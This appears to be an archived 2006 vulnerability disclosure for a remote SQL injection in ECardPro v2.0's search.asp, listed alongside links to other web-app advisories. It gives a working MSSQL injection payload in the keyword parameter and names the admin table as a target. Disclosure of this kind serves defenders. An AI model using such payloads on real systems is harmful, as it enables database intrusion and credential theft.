Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

BizDirectory all version xss

PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability

Sql injection in Moodle

MyBB 1.2 Full path and Cross site scripting vulnerabilities

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	19.09.2006
Subject:	ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title  :  ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.keyvan1.com

# Exploit;

*******************************************************************************

Data: MSSQL

###http://[target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name

Admin Table: "admin"
etc(systemtables,union,update,select)......


# ajann,Turkey
# ...
# Im not Hacker!